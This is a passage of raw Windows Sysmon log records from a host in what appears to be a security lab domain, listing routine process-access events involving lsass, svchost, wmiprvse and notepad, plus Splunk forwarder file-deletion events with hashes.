18:15:56.049{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035085483Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085482Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035085481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035085479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085478Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035085477Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085476Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035085475Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.033{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085474Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.012{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085473Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:56.012{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085472Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:56.012{B81B27B7-4012-611D-0B00-00000000C801}6366276C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085504Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:57.806{B81B27B7-4013-611D-1600-00000000C801}11965264C:\Windows\system32\svchost.exe{B81B27B7-4F5D-613A-6790-03000000C801}296C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085503Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:57.796{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4F5D-613A-6790-03000000C801}296C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085502Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:57.782{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4F5D-613A-6790-03000000C801}296C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085501Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:57.782{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4F5D-613A-6790-03000000C801}296C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085500Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:57.229{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B97545E268CF3EFD9DBAEA13704A7A6D,SHA256=177EA4175A083A318BF28888085431E893ADD840344896032591FCFFE30E50D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035085499Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:57.064{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA2B5E0AED301DFA983A27826BB20A92,SHA256=32BD146B7F2292677372C4C56FD19AD00E4D0014F6E2A3B45AE337505351B8B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085498Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:57.064{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=99C8B50D9DA9394B7A4F70CE0E767E74,SHA256=7C5831E289642F0CE871166088C036AB10D757CDAD84D1554E7A118D2E0EA1C5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085513Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:58.777{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA2B5E0AED301DFA983A27826BB20A92,SHA256=32BD146B7F2292677372C4C56FD19AD00E4D0014F6E2A3B45AE337505351B8B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085512Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:58.360{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CE4E73751FD8D1883877B284CB67C9A4,SHA256=C5DC89BFA446CDC06034FF1076A0C8F8C8851A3B06B86C9284096EF00BF378ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085511Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:58.298{B81B27B7-4133-611D-AB00-00000000C801}45644696C:\Windows\Explorer.EXE{B81B27B7-98CE-6127-BF45-01000000C801}5176C:\Windows\system32\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7c948|C:\Windows\System32\TwinUI.dll+75f2d|C:\Windows\System32\TwinUI.dll+75b03|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085510Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:58.298{B81B27B7-4133-611D-AB00-00000000C801}45644768C:\Windows\Explorer.EXE{B81B27B7-98CE-6127-BF45-01000000C801}5176C:\Windows\system32\notepad.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+15d19|C:\Windows\System32\SHELL32.dll+b1b50|C:\Windows\System32\SHELL32.dll+b3057|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd5f|C:\Windows\System32\windows.storage.dll+13aaeb|C:\Windows\System32\windows.storage.dll+13900f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085509Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:58.298{B81B27B7-4133-611D-AB00-00000000C801}45644768C:\Windows\Explorer.EXE{B81B27B7-98CE-6127-BF45-01000000C801}5176C:\Windows\system32\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b1604|C:\Windows\System32\SHELL32.dll+b3057|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd5f|C:\Windows\System32\windows.storage.dll+13aaeb|C:\Windows\System32\windows.storage.dll+13900f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085508Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:58.282{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-98CE-6127-BF45-01000000C801}5176C:\Windows\system32\notepad.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+15d19|C:\Windows\System32\SHELL32.dll+b1b50|C:\Windows\System32\SHELL32.dll+b2a80|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085507Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:58.282{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-98CE-6127-BF45-01000000C801}5176C:\Windows\system32\notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b1604|C:\Windows\System32\SHELL32.dll+b2a80|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085506Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:58.282{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-98CE-6127-BF45-01000000C801}5176C:\Windows\system32\notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085505Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:58.245{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E10388FC91C9CEC361BA2AAC0E087568,SHA256=B93321646AE7F99B264D6EE95617E00ACE5FDFCE07CFACD49593A0B064AA29BE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085516Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 